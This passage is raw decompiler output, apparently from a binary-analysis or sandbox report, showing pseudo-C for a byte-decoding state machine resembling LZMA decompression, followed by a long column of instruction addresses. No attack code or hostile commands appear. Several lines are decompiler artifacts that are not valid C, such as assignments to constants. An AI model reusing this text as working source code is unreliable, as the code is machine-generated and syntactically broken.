                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          							 *(__ebp - 0x44) = __ebx;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								goto L39;
                                                          							} else {
                                                          								goto L37;
                                                          							}
                                                          						case 0xe:
                                                          							L46:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0xe;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t156 = __ebp - 0x70;
                                                          							 *_t156 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t156;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							while(1) {
                                                          								L48:
                                                          								__eflags = __ebx - 0x100;
                                                          								if(__ebx >= 0x100) {
                                                          									break;
                                                          								}
                                                          								__eax =  *(__ebp - 0x58);
                                                          								__edx = __ebx + __ebx;
                                                          								__ecx =  *(__ebp - 0x10);
                                                          								__esi = __edx + __eax;
                                                          								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          								__ax =  *__esi;
                                                          								 *(__ebp - 0x54) = __esi;
                                                          								__edi = __ax & 0x0000ffff;
                                                          								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          								__eflags =  *(__ebp - 0xc) - __ecx;
                                                          								if( *(__ebp - 0xc) >= __ecx) {
                                                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          									__cx = __ax;
                                                          									_t170 = __edx + 1; // 0x1
                                                          									__ebx = _t170;
                                                          									__cx = __ax >> 5;
                                                          									__eflags = __eax;
                                                          									 *__esi = __ax;
                                                          								} else {
                                                          									 *(__ebp - 0x10) = __ecx;
                                                          									0x800 = 0x800 - __edi;
                                                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          									__ebx = __ebx + __ebx;
                                                          									 *__esi = __cx;
                                                          								}
                                                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          								 *(__ebp - 0x44) = __ebx;
                                                          								if( *(__ebp - 0x10) >= 0x1000000) {
                                                          									continue;
                                                          								} else {
                                                          									goto L46;
                                                          								}
                                                          							}
                                                          							L54:
                                                          							_t173 = __ebp - 0x34;
                                                          							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          							__eflags =  *_t173;
                                                          							goto L55;
                                                          						case 0xf:
                                                          							L58:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0xf;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t203 = __ebp - 0x70;
                                                          							 *_t203 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t203;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							L60:
                                                          							__eflags = __ebx - 0x100;
                                                          							if(__ebx >= 0x100) {
                                                          								L55:
                                                          								__al =  *(__ebp - 0x44);
                                                          								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          								goto L56;
                                                          							}
                                                          							L61:
                                                          							__eax =  *(__ebp - 0x58);
                                                          							__edx = __ebx + __ebx;
                                                          							__ecx =  *(__ebp - 0x10);
                                                          							__esi = __edx + __eax;
                                                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          							__ax =  *__esi;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								_t217 = __edx + 1; // 0x1
                                                          								__ebx = _t217;
                                                          								__cx = __ax >> 5;
                                                          								__eflags = __eax;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          							 *(__ebp - 0x44) = __ebx;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								goto L60;
                                                          							} else {
                                                          								goto L58;
                                                          							}
                                                          						case 0x10:
                                                          							L109:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0x10;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t365 = __ebp - 0x70;
                                                          							 *_t365 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t365;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							goto L111;
                                                          						case 0x11:
                                                          							goto L69;
                                                          						case 0x12:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 0x58);
                                                          								 *(__ebp - 0x84) = 0x13;
                                                          								__esi =  *(__ebp - 0x58) + 2;
                                                          								goto L132;
                                                          							}
                                                          							__eax =  *(__ebp - 0x4c);
                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                          							__eflags = __eax;
                                                          							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          							goto L130;
                                                          						case 0x13:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								_t469 = __ebp - 0x58;
                                                          								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          								__eflags =  *_t469;
                                                          								 *(__ebp - 0x30) = 0x10;
                                                          								 *(__ebp - 0x40) = 8;
                                                          								L144:
                                                          								 *(__ebp - 0x7c) = 0x14;
                                                          								goto L145;
                                                          							}
                                                          							__eax =  *(__ebp - 0x4c);
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                          							 *(__ebp - 0x30) = 8;
                                                          							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          							L130:
                                                          							 *(__ebp - 0x58) = __eax;
                                                          							 *(__ebp - 0x40) = 3;
                                                          							goto L144;
                                                          						case 0x14:
                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          							__eax =  *(__ebp - 0x80);
                                                          							goto L140;
                                                          						case 0x15:
                                                          							__eax = 0;
                                                          							__eflags =  *(__ebp - 0x38) - 7;
                                                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          							__al = __al & 0x000000fd;
                                                          							__eax = (__eflags >= 0) - 1 + 0xb;
                                                          							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          							goto L120;
                                                          						case 0x16:
                                                          							__eax =  *(__ebp - 0x30);
                                                          							__eflags = __eax - 4;
                                                          							if(__eax >= 4) {
                                                          								_push(3);
                                                          								_pop(__eax);
                                                          							}
                                                          							__ecx =  *(__ebp - 4);
                                                          							 *(__ebp - 0x40) = 6;
                                                          							__eax = __eax << 7;
                                                          							 *(__ebp - 0x7c) = 0x19;
                                                          							 *(__ebp - 0x58) = __eax;
                                                          							goto L145;
                                                          						case 0x17:
                                                          							L145:
                                                          							__eax =  *(__ebp - 0x40);
                                                          							 *(__ebp - 0x50) = 1;
                                                          							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          							goto L149;
                                                          						case 0x18:
                                                          							L146:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0x18;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t484 = __ebp - 0x70;
                                                          							 *_t484 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t484;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							L148:
                                                          							_t487 = __ebp - 0x48;
                                                          							 *_t487 =  *(__ebp - 0x48) - 1;
                                                          							__eflags =  *_t487;
                                                          							L149:
                                                          							__eflags =  *(__ebp - 0x48);
                                                          							if( *(__ebp - 0x48) <= 0) {
                                                          								__ecx =  *(__ebp - 0x40);
                                                          								__ebx =  *(__ebp - 0x50);
                                                          								0 = 1;
                                                          								__eax = 1 << __cl;
                                                          								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          								__eax =  *(__ebp - 0x7c);
                                                          								 *(__ebp - 0x44) = __ebx;
                                                          								goto L140;
                                                          							}
                                                          							__eax =  *(__ebp - 0x50);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          							__eax =  *(__ebp - 0x58);
                                                          							__esi = __edx + __eax;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__ax =  *__esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								__cx = __ax >> 5;
                                                          								__eax = __eax - __ecx;
                                                          								__edx = __edx + 1;
                                                          								__eflags = __edx;
                                                          								 *__esi = __ax;
                                                          								 *(__ebp - 0x50) = __edx;
                                                          							} else {
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								goto L148;
                                                          							} else {
                                                          								goto L146;
                                                          							}
                                                          						case 0x19:
                                                          							__eflags = __ebx - 4;
                                                          							if(__ebx < 4) {
                                                          								 *(__ebp - 0x2c) = __ebx;
                                                          								L119:
                                                          								_t393 = __ebp - 0x2c;
                                                          								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          								__eflags =  *_t393;
                                                          								L120:
                                                          								__eax =  *(__ebp - 0x2c);
                                                          								__eflags = __eax;
                                                          								if(__eax == 0) {
                                                          									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          									goto L170;
                                                          								}
                                                          								__eflags = __eax -  *(__ebp - 0x60);
                                                          								if(__eax >  *(__ebp - 0x60)) {
                                                          									goto L171;
                                                          								}
                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          								__eax =  *(__ebp - 0x30);
                                                          								_t400 = __ebp - 0x60;
                                                          								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          								__eflags =  *_t400;
                                                          								goto L123;
                                                          							}
                                                          							__ecx = __ebx;
                                                          							__eax = __ebx;
                                                          							__ecx = __ebx >> 1;
                                                          							__eax = __ebx & 0x00000001;
                                                          							__ecx = (__ebx >> 1) - 1;
                                                          							__al = __al | 0x00000002;
                                                          							__eax = (__ebx & 0x00000001) << __cl;
                                                          							__eflags = __ebx - 0xe;
                                                          							 *(__ebp - 0x2c) = __eax;
                                                          							if(__ebx >= 0xe) {
                                                          								__ebx = 0;
                                                          								 *(__ebp - 0x48) = __ecx;
                                                          								L102:
                                                          								__eflags =  *(__ebp - 0x48);
                                                          								if( *(__ebp - 0x48) <= 0) {
                                                          									__eax = __eax + __ebx;
                                                          									 *(__ebp - 0x40) = 4;
                                                          									 *(__ebp - 0x2c) = __eax;
                                                          									__eax =  *(__ebp - 4);
                                                          									__eax =  *(__ebp - 4) + 0x644;
                                                          									__eflags = __eax;
                                                          									L108:
                                                          									__ebx = 0;
                                                          									 *(__ebp - 0x58) = __eax;
                                                          									 *(__ebp - 0x50) = 1;
                                                          									 *(__ebp - 0x44) = 0;
                                                          									 *(__ebp - 0x48) = 0;
                                                          									L112:
                                                          									__eax =  *(__ebp - 0x40);
                                                          									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                          										_t391 = __ebp - 0x2c;
                                                          										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                          										__eflags =  *_t391;
                                                          										goto L119;
                                                          									}
                                                          									__eax =  *(__ebp - 0x50);
                                                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          									__eax =  *(__ebp - 0x58);
                                                          									__esi = __edi + __eax;
                                                          									 *(__ebp - 0x54) = __esi;
                                                          									__ax =  *__esi;
                                                          									__ecx = __ax & 0x0000ffff;
                                                          									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                          									__eflags =  *(__ebp - 0xc) - __edx;
                                                          									if( *(__ebp - 0xc) >= __edx) {
                                                          										__ecx = 0;
                                                          										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                          										__ecx = 1;
                                                          										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                          										__ebx = 1;
                                                          										__ecx =  *(__ebp - 0x48);
                                                          										__ebx = 1 << __cl;
                                                          										__ecx = 1 << __cl;
                                                          										__ebx =  *(__ebp - 0x44);
                                                          										__ebx =  *(__ebp - 0x44) | __ecx;
                                                          										__cx = __ax;
                                                          										__cx = __ax >> 5;
                                                          										__eax = __eax - __ecx;
                                                          										__edi = __edi + 1;
                                                          										__eflags = __edi;
                                                          										 *(__ebp - 0x44) = __ebx;
                                                          										 *__esi = __ax;
                                                          										 *(__ebp - 0x50) = __edi;
                                                          									} else {
                                                          										 *(__ebp - 0x10) = __edx;
                                                          										0x800 = 0x800 - __ecx;
                                                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          										 *__esi = __dx;
                                                          									}
                                                          									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          									if( *(__ebp - 0x10) >= 0x1000000) {
                                                          										L111:
                                                          										_t368 = __ebp - 0x48;
                                                          										 *_t368 =  *(__ebp - 0x48) + 1;
                                                          										__eflags =  *_t368;
                                                          										goto L112;
                                                          									} else {
                                                          										goto L109;
                                                          									}
                                                          								}
                                                          								__ecx =  *(__ebp - 0xc);
                                                          								__ebx = __ebx + __ebx;
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                          								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          								 *(__ebp - 0x44) = __ebx;
                                                          								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                          									__ecx =  *(__ebp - 0x10);
                                                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          									__ebx = __ebx | 0x00000001;
                                                          									__eflags = __ebx;
                                                          									 *(__ebp - 0x44) = __ebx;
                                                          								}
                                                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          								if( *(__ebp - 0x10) >= 0x1000000) {
                                                          									L101:
                                                          									_t338 = __ebp - 0x48;
                                                          									 *_t338 =  *(__ebp - 0x48) - 1;
                                                          									__eflags =  *_t338;
                                                          									goto L102;
                                                          								} else {
                                                          									goto L99;
                                                          								}
                                                          							}
                                                          							__edx =  *(__ebp - 4);
                                                          							__eax = __eax - __ebx;
                                                          							 *(__ebp - 0x40) = __ecx;
                                                          							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                          							goto L108;
                                                          						case 0x1a:
                                                          							L56:
                                                          							__eflags =  *(__ebp - 0x64);
                                                          							if( *(__ebp - 0x64) == 0) {
                                                          								 *(__ebp - 0x88) = 0x1a;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x68);
                                                          							__al =  *(__ebp - 0x5c);
                                                          							__edx =  *(__ebp - 8);
                                                          							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          							 *( *(__ebp - 0x68)) = __al;
                                                          							__ecx =  *(__ebp - 0x14);
                                                          							 *(__ecx +  *(__ebp - 8)) = __al;
                                                          							__eax = __ecx + 1;
                                                          							__edx = 0;
                                                          							_t192 = __eax %  *(__ebp - 0x74);
                                                          							__eax = __eax /  *(__ebp - 0x74);
                                                          							__edx = _t192;
                                                          							goto L79;
                                                          						case 0x1b:
                                                          							goto L75;
                                                          						case 0x1c:
                                                          							while(1) {
                                                          								L123:
                                                          								__eflags =  *(__ebp - 0x64);
                                                          								if( *(__ebp - 0x64) == 0) {
                                                          									break;
                                                          								}
                                                          								__eax =  *(__ebp - 0x14);
                                                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          								__eflags = __eax -  *(__ebp - 0x74);
                                                          								if(__eax >=  *(__ebp - 0x74)) {
                                                          									__eax = __eax +  *(__ebp - 0x74);
                                                          									__eflags = __eax;
                                                          								}
                                                          								__edx =  *(__ebp - 8);
                                                          								__cl =  *(__eax + __edx);
                                                          								__eax =  *(__ebp - 0x14);
                                                          								 *(__ebp - 0x5c) = __cl;
                                                          								 *(__eax + __edx) = __cl;
                                                          								__eax = __eax + 1;
                                                          								__edx = 0;
                                                          								_t414 = __eax %  *(__ebp - 0x74);
                                                          								__eax = __eax /  *(__ebp - 0x74);
                                                          								__edx = _t414;
                                                          								__eax =  *(__ebp - 0x68);
                                                          								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                          								__eflags =  *(__ebp - 0x30);
                                                          								 *( *(__ebp - 0x68)) = __cl;
                                                          								 *(__ebp - 0x14) = _t414;
                                                          								if( *(__ebp - 0x30) > 0) {
                                                          									continue;
                                                          								} else {
                                                          									goto L80;
                                                          								}
                                                          							}
                                                          							 *(__ebp - 0x88) = 0x1c;
                                                          							goto L170;
                                                          					}
                                                          				}
                                                          			}













                                                          0x00000000
                                                          0x004070ab
                                                          0x004070ab
                                                          0x004070af
                                                          0x00407166
                                                          0x00407169
                                                          0x00407175
                                                          0x00407056
                                                          0x00407056
                                                          0x00407059
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x0040741a
                                                          0x00407441
                                                          0x00407441
                                                          0x00407447
                                                          0x00407447
                                                          0x00000000
                                                          0x0040741c
                                                          0x0040741c
                                                          0x00407420
                                                          0x004075cf
                                                          0x00000000
                                                          0x004075cf
                                                          0x0040742c
                                                          0x00407433
                                                          0x0040743b
                                                          0x0040743e
                                                          0x00000000
                                                          0x0040743e
                                                          0x004070b5
                                                          0x004070b9
                                                          0x004075fa
                                                          0x004075fa
                                                          0x004075fd
                                                          0x00407601
                                                          0x00407601
                                                          0x004070bf
                                                          0x004070c5
                                                          0x004070c8
                                                          0x004070cc
                                                          0x004070cf
                                                          0x004070d3
                                                          0x00407599
                                                          0x004075e5
                                                          0x004075ed
                                                          0x004075f4
                                                          0x004075f6
                                                          0x00000000
                                                          0x004075f6
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070e2
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e7
                                                          0x004070ea
                                                          0x004070ed
                                                          0x004070f0
                                                          0x004070f3
                                                          0x004070f6
                                                          0x004070f7
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070fc
                                                          0x004070ff
                                                          0x00407102
                                                          0x00407105
                                                          0x00407105
                                                          0x00407108
                                                          0x0040710a
                                                          0x0040710a
                                                          0x0040710d
                                                          0x0040710d
                                                          0x0040710d
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406bec
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x00000000
                                                          0x00406bfd
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c06
                                                          0x00406c09
                                                          0x00406c0c
                                                          0x00406c10
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c16
                                                          0x00406c19
                                                          0x00406c1b
                                                          0x00406c1c
                                                          0x00406c1f
                                                          0x00406c21
                                                          0x00406c22
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2c
                                                          0x00406c31
                                                          0x00406c3a
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00406c5c
                                                          0x00406c84
                                                          0x00406c86
                                                          0x00406c94
                                                          0x00406c94
                                                          0x00406c98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c88
                                                          0x00406c8b
                                                          0x00406c8c
                                                          0x00406c8c
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c62
                                                          0x00406c67
                                                          0x00406c67
                                                          0x00406c70
                                                          0x00406c78
                                                          0x00406c7b
                                                          0x00000000
                                                          0x00406c81
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c9e
                                                          0x00406c9e
                                                          0x00406ca2
                                                          0x0040754e
                                                          0x00000000
                                                          0x0040754e
                                                          0x00406cab
                                                          0x00406cbb
                                                          0x00406cbe
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc4
                                                          0x00406cc8
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cca
                                                          0x00406cd0
                                                          0x00406cfa
                                                          0x00406d00
                                                          0x00406d07
                                                          0x00000000
                                                          0x00406d07
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cde
                                                          0x00406cde
                                                          0x00406ce9
                                                          0x00406cf1
                                                          0x00406cf4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d39
                                                          0x00406d3f
                                                          0x00406d42
                                                          0x00406d4f
                                                          0x00406d57
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d0e
                                                          0x00406d0e
                                                          0x00406d12
                                                          0x0040755d
                                                          0x00000000
                                                          0x0040755d
                                                          0x00406d1e
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d2c
                                                          0x00406d2f
                                                          0x00406d32
                                                          0x00406d37
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d5f
                                                          0x00406d61
                                                          0x00406d64
                                                          0x00406dd5
                                                          0x00406dd8
                                                          0x00406ddb
                                                          0x00406de2
                                                          0x00406dec
                                                          0x00000000
                                                          0x00406dec
                                                          0x00406d66
                                                          0x00406d6a
                                                          0x00406d6d
                                                          0x00406d6f
                                                          0x00406d72
                                                          0x00406d75
                                                          0x00406d77
                                                          0x00406d7a
                                                          0x00406d7c
                                                          0x00406d81
                                                          0x00406d84
                                                          0x00406d87
                                                          0x00406d8b
                                                          0x00406d92
                                                          0x00406d95
                                                          0x00406d9c
                                                          0x00406da0
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406dac
                                                          0x00406daf
                                                          0x00406dcd
                                                          0x00406dcf
                                                          0x00000000
                                                          0x00406db1
                                                          0x00406db1
                                                          0x00406db4
                                                          0x00406db7
                                                          0x00406dba
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbf
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc5
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00406ffe
                                                          0x00407002
                                                          0x00407020
                                                          0x00407023
                                                          0x0040702a
                                                          0x0040702d
                                                          0x00407030
                                                          0x00407033
                                                          0x00407036
                                                          0x00407039
                                                          0x0040703b
                                                          0x00407042
                                                          0x00407043
                                                          0x00407045
                                                          0x00407048
                                                          0x0040704b
                                                          0x0040704e
                                                          0x0040704e
                                                          0x00407053
                                                          0x00000000
                                                          0x00407053
                                                          0x00407004
                                                          0x00407007
                                                          0x0040700a
                                                          0x00407014
                                                          0x00000000
                                                          0x00000000
                                                          0x00407068
                                                          0x0040706c
                                                          0x0040708f
                                                          0x00407092
                                                          0x00407095
                                                          0x0040709f
                                                          0x0040706e
                                                          0x0040706e
                                                          0x00407071
                                                          0x00407074
                                                          0x00407077
                                                          0x00407084
                                                          0x00407087
                                                          0x00407087
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040711c
                                                          0x00407120
                                                          0x00407127
                                                          0x0040712a
                                                          0x0040712d
                                                          0x00407137
                                                          0x00000000
                                                          0x00407137
                                                          0x00407122
                                                          0x00000000
                                                          0x00000000
                                                          0x00407143
                                                          0x00407147
                                                          0x0040714e
                                                          0x00407151
                                                          0x00407154
                                                          0x00407149
                                                          0x00407149
                                                          0x00407149
                                                          0x00407157
                                                          0x0040715a
                                                          0x0040715d
                                                          0x0040715d
                                                          0x00407160
                                                          0x00407163
                                                          0x00000000
                                                          0x00000000
                                                          0x00407203
                                                          0x00407203
                                                          0x00407207
                                                          0x004075a5
                                                          0x00000000
                                                          0x004075a5
                                                          0x0040720d
                                                          0x00407210
                                                          0x00407213
                                                          0x00407217
                                                          0x0040721a
                                                          0x00407220
                                                          0x00407222
                                                          0x00407222
                                                          0x00407222
                                                          0x00407225
                                                          0x00407228
                                                          0x00000000
                                                          0x00000000
                                                          0x00406df8
                                                          0x00406df8
                                                          0x00406dfc
                                                          0x00407569
                                                          0x00000000
                                                          0x00407569
                                                          0x00406e02
                                                          0x00406e05
                                                          0x00406e08
                                                          0x00406e0c
                                                          0x00406e0f
                                                          0x00406e15
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e1a
                                                          0x00406e1d
                                                          0x00406e1d
                                                          0x00406e20
                                                          0x00406e23
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e29
                                                          0x00406e2f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e35
                                                          0x00406e35
                                                          0x00406e39
                                                          0x00406e3c
                                                          0x00406e3f
                                                          0x00406e42
                                                          0x00406e45
                                                          0x00406e46
                                                          0x00406e49
                                                          0x00406e4b
                                                          0x00406e51
                                                          0x00406e54
                                                          0x00406e57
                                                          0x00406e5a
                                                          0x00406e5d
                                                          0x00406e60
                                                          0x00406e63
                                                          0x00406e7f
                                                          0x00406e82
                                                          0x00406e85
                                                          0x00406e88
                                                          0x00406e8f
                                                          0x00406e93
                                                          0x00406e95
                                                          0x00406e99
                                                          0x00406e65
                                                          0x00406e65
